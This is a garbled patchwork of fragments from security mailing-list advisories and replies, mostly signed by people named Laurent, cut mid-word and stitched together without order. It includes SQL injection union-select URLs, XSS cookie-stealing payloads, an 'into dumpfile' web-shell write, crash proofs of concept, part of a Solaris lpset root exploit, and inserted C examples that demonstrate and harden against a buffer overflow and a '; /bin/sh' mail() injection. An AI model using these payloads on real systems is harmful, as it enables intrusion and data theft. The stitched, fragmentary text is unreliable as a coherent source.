n2own/CSW exploit from Vincenzo
Iozzo, Ralf Philipp Weinmann, and Willem Pinckaers
A workaround for this latest vulnerability (CVE-2011-1290) could be to
disable JavaScript, as explained on RIM resources.
You should definitely read this: http://www.blackberry.com/btsc/KB26132
Have a nice day,
ations are available here:
http://blog.tehtri-security.com/2011/03/about-iphone-ios43-personal-hotspot.html
Happy update this week for lucky owners of iPhone / http://apple.com/ios
Best regards,
Laurent Oudot, CEO TEHTRI-Security
Web: http://www.tehtri-security.com
twt: @tehtris
Join us for more h
"Good night, and Good luck."
Best regards,
Laurent OUDOT, from Washington DC, USA @BlackHatDC Briefings
( http://blackhat.com/html/bh-dc-11/bh-dc-11-briefings.html#Oudot )
TEHTRI-Security - "This is not a Game."
http://www.tehtri-security.com/
http://twitter/tehtris
010-1752" here too: http://support.apple.com/kb/HT4435 ).
Happy update, Apple folks ;-)
Best regards,
Laurent OUDOT, from Abu Dhabi, UAE @ BlackHat Briefings
( http://blackhat.com/html/bh-ad-10/bh-ad-10-briefings.html#Oudot )
TEHTRI-Security - "This is not a Game."
http://www.tehtri-security.com/
http://twitter/tehtris
12 October ) :
http://conference.hackinthebox.org/hitbsecconf2010kul/?page_id=274
See you soon at the awesome international conference HITBSecConf
Malaysia 2010,
Laurent OUDOT, CEO & Founder TEHTRI-Security
http://www.tehtri-security.com/
* References:
- BBC => http://www.bbc.co.uk
y.com/en/agenda.php
See you soon.
Thanks. Take care.
Laurent Oudot, founder & CEO of TEHTRI-Security
TEHTRI-Security, "This is not a game".
http://www.tehtri-security.com
emote File Disclos
More explanations available on our web site:
http://www.tehtri-security.com/en/news.php
Do not hesitate to contact us directly if needed.
Best regards,
Take care.
Laurent OUDOT - "TEHTRI-Security, This is not a game."
CEO & Founder of TEHTRI-Security
http://www.tehtri-security.com/
urity issues, do not hesitate to contact us, so that we can
help and assist you with our innovative technologies or our trainings.
Laurent OUDOT, Founder and CEO of TEHTRI-Security
http://www.tehtri-security.com
Next public confirmed event worldwide :
- SyScan Singapore (SG), June, Speakers "Str
p
of a web attack (backdoors, bounces...) and how to detect them
See you soon at HITBSecConf Dubai...
Laurent OUDOT, founder & CEO of TEHTRI-Security, "/This is not a game./"
http://www.tehtri-security.com
There is no SQL injection vulnerability in WebTools as we are not using a
database. The MyDocs URL ("/wt3/summary.php?select=") is safe as "select" is
just the name of a variable and the name has nothing to do with the SELECT
command in SQL.
Please provide details about the Fiery model and version so that we
sco/Linksys web site. Any other
wireless device relying on this vulnerable wireless driver is likely to
be vulnerable.
Credits:
* This vulnerability was discovered by Laurent Butti from France Telecom
/ Orange
cess point firmwares.
This security vulnerability was reported to Netgear, updated firmwares
should be available on their web site. Any other wireless device relying
on this vulnerable wireless driver is likely to be vulnerable.
Credits:
* This vulnerability was discovered by Laurent
There is a flaw in the way OSCommerce handles sessions.
When a client visits an OSCommerce web page, the server sends a cookie. That
cookie will be the session cookie for every further request. Thus, once logged
in, the cookie will be used to authenticate the user.
When logging in (without
Gabriel Campana and Laurent Butti
from France Telecom / Orange
this vulnerable wireless driver is
likely to be vulnerable.
Credits:
* This vulnerability was discovered by Laurent Butti and Julien Tinnes
from France Telecom / Orange
lity was reported to Linksys, updated firmwares
should be available on their web site. Any other wireless device relying
on this vulnerable wireless driver is likely to be vulnerable.
Credits:
* This vulnerability was discovered by Laurent Butti and Julien Tinnes
from France Telecom / Orange
ver for their access point firmwares.
This security vulnerability was reported to Netgear, updated firmwares
should be available on their web site. Any other wireless device relying
on this vulnerable wireless driver is likely to be vulnerable.
Credits:
* This vulnerability was discovered
ess device relying
on this vulnerable wireless driver is likely to be vulnerable.
Credits:
* This vulnerability was discovered by Laurent Butti and Julien Tinnes
from France Telecom / Orange
public release of advisory
Credits:
* This vulnerability was discovered by Gabriel Campana and Laurent Butti
from France Telecom / Orange
0
eip=73d22054 esp=00dff278 ebp=00dff200 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206
MFC42!Ordinal5163+0x492:
73d22054 8908mov dword ptr [eax],ecx ds:0023:41414141=
=
5)Credits
laurent gaffié
laurent.gaffie[at]gmail[dot]com
Hi there
Original advisory:
http://milw0rm.com/exploits/5458
There's another stack-based buffer overflow in demux_nfs.c
line 111:
this->copyright = strdup(&header[0x4E]);
line 189:
char copyright[100];
line 208:
sprintf(copyright, "(C) %s", this->copyright);
Regards Laurent Gaffié
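The three quoted lines show the pattern behind the overflow: an unbounded header field copied with strdup(), then formatted with sprintf() into a 100-byte stack buffer. The following is an added example, not xine-lib's code and not the post author's: it computes what that sprintf() would write, pairs both calls with bounded replacements, and runs them on a constructed header. The header size, the function names and the constructed inputs are assumptions.

```c
/* Added example, not xine-lib code. Sizes mirror the three quoted lines. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define COPYRIGHT_BUF 100   /* the post's "char copyright[100]" */
#define COPYRIGHT_OFS 0x4E  /* the post's "&header[0x4E]" */
#define DEMO_HDR_LEN  0x80  /* assumed header size for the constructed input */

/* Bytes that sprintf(copyright, "(C) %s", field) would write, NUL included.
 * Computed rather than written, so no stack buffer is involved. */
size_t copyright_write_len(const char *field)
{
    return strlen("(C) ") + strlen(field) + 1;
}

/* 1 if the quoted sprintf() would run past the 100-byte buffer. */
int copyright_overflows(const char *field)
{
    return copyright_write_len(field) > COPYRIGHT_BUF;
}

/* Bounded replacement for the quoted sprintf(): snprintf() never writes past
 * dstsz and returns how much it wanted to write, so truncation is detected
 * instead of silently clobbering the stack. 0 = ok, 1 = truncated, -1 = error. */
int format_copyright_safe(char *dst, size_t dstsz, const char *field)
{
    int n = snprintf(dst, dstsz, "(C) %s", field);
    if (n < 0)
        return -1;
    return (size_t)n >= dstsz ? 1 : 0;
}

/* Replacement for the quoted strdup(&header[0x4E]): strdup() keeps reading
 * until a NUL, which a hostile header need not contain, so this copy also
 * stops at the header's end. Caller frees the result. */
char *extract_copyright(const unsigned char *header, size_t hdrlen)
{
    if (hdrlen <= COPYRIGHT_OFS)
        return NULL;
    const char *p = (const char *)header + COPYRIGHT_OFS;
    size_t max = hdrlen - COPYRIGHT_OFS, len = 0;
    while (len < max && p[len] != '\0')
        len++;
    char *out = malloc(len + 1);
    if (!out)
        return NULL;
    memcpy(out, p, len);
    out[len] = '\0';
    return out;
}

/* Constructed input: a 0x80-byte header whose field is 50 'A's with no NUL
 * anywhere after offset 0x4E. Returns the extracted field's length (50). */
size_t demo_unterminated_header(void)
{
    unsigned char header[DEMO_HDR_LEN];
    memset(header, 0, sizeof header);
    memset(header + COPYRIGHT_OFS, 'A', sizeof header - COPYRIGHT_OFS);
    char *field = extract_copyright(header, sizeof header);
    size_t len = field ? strlen(field) : 0;
    free(field);
    return len;
}

/* Constructed input: a 120-byte field, too big for the post's buffer. Returns
 * 1 when snprintf() reports truncation and left the buffer NUL-terminated. */
int demo_oversized_field(void)
{
    char big[121];
    memset(big, 'B', 120);
    big[120] = '\0';
    char copyright[COPYRIGHT_BUF];
    int rc = format_copyright_safe(copyright, sizeof copyright, big);
    return (rc == 1 && strlen(copyright) == COPYRIGHT_BUF - 1) ? 1 : 0;
}

int main(void)
{
    char big[121];
    memset(big, 'B', 120);
    big[120] = '\0';
    printf("50-byte field extracted: %zu bytes\n", demo_unterminated_header());
    printf("120-byte field: quoted sprintf() overflows=%d, snprintf() truncates safely=%d\n",
           copyright_overflows(big), demo_oversized_field());
    return 0;
}
```

The point of keeping both checks is that the quoted code has two separate reads of attacker-controlled length: strdup() trusts the header to contain a NUL, and sprintf() trusts the result to fit in 100 bytes. Bounding only one of them leaves the other.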
Please, can you do a simple SEARCH before you start an 'audit' of a piece of software?
http://search.securityfocus.com/swsearch?query=netclassifieds&sbm=%2F&submit=Search%21&metaname=alldoc&sort=swishrank
http://milw0rm.com/exploits/4092
http://www.securityfocus.com/archive/1/471944
Thanks for sea
lor
-SetHREF
-SetMovieName
-SetTarget
-SetMatrix
=
3)Proof of concept
=
Proof of concept example [works with the other functions supplied in section
2)]:
sub test()
bar = String(515305, "A")
foo.SetBgColor bar
End Sub
=
5)Credits
=====
l
close($FILE);
print "$file has been created \n";
,
konqueror will crash.
=
3)Proof of concept
=
Proof of concept example :
4)Greets
Berga,team soh, #futurezone, #soh
=
5)Credits
=
laurent gaffié
tation (core dumped)
[EMAIL PROTECTED]:/# php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");'
Segmentation fault (core dumped)
4)Greets
Benjilenoob,team soh, #futurezone, #soh
=
5)Credits
=
laurent gaffié
=
3)Proof of concept
=
Proof of concept example :
result:
[EMAIL PROTECTED]:~/Desktop# php shot.php
Segmentation fault (core dumped)
[EMAIL PROTECTED]:~/Desktop#
4)Greets
Benjilenoob, Ivanlef0u, la team soh, #futurezone, #soh
=
5)Credits
=
laurent gaffié
IE7
using the avivra idea/example shown in his video
here's a live example:
http://dams083.free.fr/pdf_poc.exe?1.pdf
The PDF is opened, calc.exe is launched, no prompt.
we can imagine the impact with a:
-permanent Xss
-malicious webpage
-worm
-etc
regards laurent gaffié
//sorry for the delay.
"Credits Goes To Aria-Security Team"
http://www.securityfocus.com/archive/1/451594
.htt
.itpc
.itms
.dvr-ms
.dib
.asf
.tif
etc ...
=
5) Conclusion
=
This is very funny, because actually it only works for .exe extensions.
With .COM, .PIF, etc. you can't do this (overwrite the extension and then
bypass the filter).
I guess we can wonder what the heck.
regards laurent gaffié
!
An example can be given on the demo website:
http://www.greensql.net/sql-injection-test fill login or password with
alert(document.cookie)
then go to the admin panel: http://demo.greensql.net/ and the XSS will be executed.
=====
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
start to trust these kinds of functions and then leave
some holes in the wall letting in the water, your shared env will be down
very soon.
So I guess the question should be:
"shall I let a piece of software drive my security or shall I rtfm and start to
know what I am doing?"//not talking o
mon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
variant : select 'http://site.com/hello.html";)?>' into dumpfile
'/home/NOT_MY_USER/www/index1.php';
=
4)Credits & greets
===
Segmentation fault
debian:/home/lorenzo#
4)Greets
Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone &
#nibbles
=
5)Credits
=
laurent gaffié
[EMAIL PROTECTED]
secorizon coming soon !
ntation fault.
[Switching to Thread -1216637248 (LWP 29543)]
0xb77d9d1b in iconv_open () from /lib/tls/libc.so.6
4)Greets
Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone &
#nibbles
=
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
from worldnet: #futurezone &
#nibbles
=
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
stay tuned, site coming soon
=
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
stay tuned, site coming soon
ignal SIGSEGV, Segmentation fault.
[Switching to Thread -1215031616 (LWP 11156)]
0xb79d3a5a in globfree () from /lib/tls/i686/cmov/libc.so.6
4)Greets
Ivanlef0u,Deimos,benji,soh
,and everyones on worldnet: #futurezone &
#nibbles
=
5)Credits
=
Laurent gaffie
contact :
"Firefox will do the same if it's configured that.Is this the default behavior
with Safari?"
Yes, it's a default setting.
"I don't see that this is a bug. Could you explain a little more fully?"
Well, configured like this by default, it's a security hole. It's a perfect hole
for a virus, trojan
desktop without any prompt ... )
=
4) Conclusion
=
Any potentially dangerous file should be prompted for (like .exe, .com, .pif,
etc.)
before uploading the file.
regards laurent gaffié
diffusing this kind of false advisory.
regards laurent gaffié
code, unless to do a basic search with your editor for :
-include($
-include_once($
-require($
-require_once($
Please, guys, stop diffusing this kind of false advisory.
regards laurent gaffié
s Hamid Ebadi has mentioned,
$lang is also vulnerable to directory traversal
=
4)Credits
=
laurent gaffie
contact : [EMAIL PROTECTED]
d.php?mod=publisher&op=viewarticle&cid=2&artid=-9+union+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/*
regards laurent gaffié
contact : [EMAIL PROTECTED]
yes )
this will avoid juicy errors , such as table name and the complete query
3) imageresizer.php
line 2:
ADD :
ini_set("display_errors", "0");
( same reason as Common.php )
line 100 :
replace : echo("$msg
file=".__FILE__."")
BY
echo("error while processing
ot;>alert(document.cookie)
Full path :
http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq[]=1
http://127.0.0.1/PHPJK/G_Display.php?sSort[]=Name_A
http://127.0.0.1/PHPJK/index.php?iParentUnq[]=0
regards laurent gaffie
contact: [EMAIL PROTECTED]
Database Name $config['prefix'] = "cp";
...
'8725ade7b722d1ad43b7b949162eab4d'
ps1:
0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870
--> /usr/local/apache2/htdocs/cpcommerce/_config.php
ps2: /**/cpAccounts/* --> cp = prefix.
Accounts --> table_name .
(cp is the default one) so you can try with your table prefix .
regards laurent gaffie
7%20from%20news_comment/*
//information is in the source code.
*
0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870
= /usr/local/apache2/htdocs/dgnews/admin/conf.php
ps: works regardless of php.ini settings .
regards laurent gaffie
eges.
your file will be located here:
./jetbox/webfiles/yourfile.php
solution:
1) xss --> use: http://us.php.net/manual/en/function.htmlentities.php
2) upload script :
--> allow only certain extensions, such as:
txt, mp3, zip, rar, pdf, odt, doc... etc.
regards laurent gaffié.
d .
reminder:
permanent xss are dangerous ...
see : http://en.wikipedia.org/wiki/Cross_site_scripting
regards laurent gaffié
contact: laurent.gaffie[at]g/**/m/**/a/**/i/**/l.com
With the version 3.04 this security issue is fixed
download and try it: http://worksystem.sourceforge.net
best regards
Laurent
On 22 Jun 2006 at 10:36, Darren Clarke wrote:
> Tested and confirmed on Opera 9.00 built 8482.
> Interesting this also managed to crash Notepad.exe on Windows XP SP2
> Home Edition when viewing the source of the page in IE7 Beta 2.
>
Discussed here http://my.opera.com/community/forums/topic.dml?
erl source) :
#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose only
#
# Laurent Licour 28/10/02
# [EMAIL PROTECTED]
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require
> Add this line: extra_cmd=NULL;
> in file ext/standard/mail.c, (line #152, just before if (extra_cmd !=
> NULL) { ) :
> and recompile php.
You can also use extra_cmd = php_escape_shell_cmd(extra_cmd);
to unescape all characters.
In latest CVS you can see
extra_cmd = php_escape_shell_arg(Z
The PHP mail() function does not check for or escape shell commands,
even if PHP is running in safe_mode.
So it may be possible to bypass the safe_mode restriction and gain
shell access.
Affected:
php4.0.6
php4.0.5
Significant lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.
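The reply and the original advisory above describe one defect: mail()'s fifth parameter is pasted into the sendmail command line and handed to a shell without escaping. The following is an added example, not PHP's ext/standard/mail.c: it shows the naive concatenation next to a single-quote escaper that does what the php_escape_shell_arg() named in the reply does, applied to a constructed attacker value. The "-t -i" arguments, the sendmail path and the function names are assumptions.

```c
/* Added example, not PHP source. Shows the unescaped concatenation and a
 * single-quote escaper in the style of php_escape_shell_arg(). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The vulnerable shape: the caller's string goes into the command line
 * untouched, so "; /bin/sh" after the intended -f option reaches the shell
 * that popen() runs the line through. */
char *build_sendmail_cmd_unsafe(const char *sendmail, const char *extra_cmd)
{
    size_t n = strlen(sendmail) + strlen(" -t -i ") + strlen(extra_cmd) + 1;
    char *cmd = malloc(n);
    if (!cmd)
        return NULL;
    snprintf(cmd, n, "%s -t -i %s", sendmail, extra_cmd);
    return cmd;
}

/* 1 if extra_cmd carries anything /bin/sh would interpret. */
int has_shell_metachars(const char *s)
{
    return strpbrk(s, ";|&`$(){}<>\n'\"\\*?[]~") != NULL;
}

/* Single-quote escaping for one /bin/sh word: wrap in '...' and rewrite each
 * embedded ' as '\'' (close quote, escaped quote, reopen). Inside single
 * quotes the shell interprets nothing else. Caller frees the result. */
char *escape_shell_arg(const char *s)
{
    size_t len = strlen(s), quotes = 0;
    for (size_t i = 0; i < len; i++)
        if (s[i] == '\'')
            quotes++;
    /* each ' grows by 3 bytes; plus two wrapping quotes and the NUL */
    char *out = malloc(len + 3 * quotes + 3);
    if (!out)
        return NULL;
    char *p = out;
    *p++ = '\'';
    for (size_t i = 0; i < len; i++) {
        if (s[i] == '\'') {
            memcpy(p, "'\\''", 4);
            p += 4;
        } else {
            *p++ = s[i];
        }
    }
    *p++ = '\'';
    *p = '\0';
    return out;
}

/* Hardened shape: the whole extra_cmd becomes one quoted shell word, so the
 * shell never sees the ';' as a command separator. */
char *build_sendmail_cmd_safe(const char *sendmail, const char *extra_cmd)
{
    char *esc = escape_shell_arg(extra_cmd);
    if (!esc)
        return NULL;
    size_t n = strlen(sendmail) + strlen(" -t -i ") + strlen(esc) + 1;
    char *cmd = malloc(n);
    if (cmd)
        snprintf(cmd, n, "%s -t -i %s", sendmail, esc);
    free(esc);
    return cmd;
}

int main(void)
{
    /* Constructed attacker value: a plausible -f sender followed by a
     * command separator and a shell. */
    const char *extra = "-fattacker@example.com; /bin/sh";
    char *bad = build_sendmail_cmd_unsafe("/usr/sbin/sendmail", extra);
    char *good = build_sendmail_cmd_safe("/usr/sbin/sendmail", extra);
    printf("metachars: %d\nunsafe: %s\nsafe:   %s\n",
           has_shell_metachars(extra), bad, good);
    free(bad);
    free(good);
    return 0;
}
```

Quoting only settles what the shell does: the full string still reaches sendmail as one argument, and whether sendmail should accept an arbitrary caller-supplied argument at all is a separate question, which is why the first patch quoted in the reply simply sets extra_cmd to NULL.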
y problem, I guess fopen/fwrite ...
are also a security problem, as the attacker can also use the fopen/fwrite
functions to create the file 's2' in /tmp, for example.
In this case the problem is that the attacker is able to upload and
execute a PHP script. And this is not PHP safe_mode's fault.
So for me error_log does not break safe_mode.
--
Laurent Papier - Admin. systeme
Sdv Plurimedia - <http://www.sdv.fr>
be used with the open_basedir directive in
order to limit user filesystem access.
As error_log is limited by open_basedir, suexec is not needed to have a
secure system as long as open_basedir is correctly set.
I see nothing wrong with allowing users to use error_log.
I don't think the PHP team should change the error_log function.
--
Laurent Papier - Admin. systeme
Sdv Plurimedia - <http://www.sdv.fr>
CTED]
>>PGP Key (DSS) http://naif.itapac.net/naif.asc
>>
>>Home Page URL:http://www.inet.it
>>Sede: Via Darwin, 85 20019 Settimo Milanese (MI)
>>Tel: 02-328631 Fax: 02-328637701
>>--
>>Free a
the internet. SUQ.DIQ can be found at
>http://suq_diq.tripod.com
>
>
>Kim Vanvaeck
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
Argosnet Security Server : http://www.Argosnet.com
"Le Veilleur Technologique", "The Technology Watcher"
Cheers,
Also available on multiple sites (technotronic, Argosnet, rootshell, ...) for a very
long time.
As said previously, will mail the Sparc version
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
Argosnet Security Server : http://www.Argosnet.com
Hi,
I got this exploit working on multiple Solaris versions (2.5.1, 2.6 & 7), Sparc version.
It is similar, but based on the lpset command instead of lp, with root privileges gained in
a second.
Will mail it soon.
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
fprintf(stderr, "ret: 0x%lx xlen: %d ofs: 0x%lx (%d)\n",
ret, strlen(buf)-2, ofs, ofs);
execl("/usr/bin/lpset","lpset","-n","xfn","-a",&buf[2],"lpcol1",0);
perror("execl");
}
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
Argosnet Security Server : http://www.Argosnet.com
"Le Veilleur Technologique", "The Technology Watcher"
>
>Hello Laurent,
>
>My name is Tal Benzion and I work on the Timbuktu product in Netopia. I am
>pleased to let you know that we have fixed the DoS problem with Timbuktu Pro
>2000, released on March 15th. This is in regards to your findings, posted
>on WIN2K http://
or example)
- Stop Timbuktu services
- Start them again.
Patches:
Not yet
Netopia is now aware of this.
Best regards
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
Argosnet Security Server : http://www.Argosnet.com
"Le Veilleur Technologiqu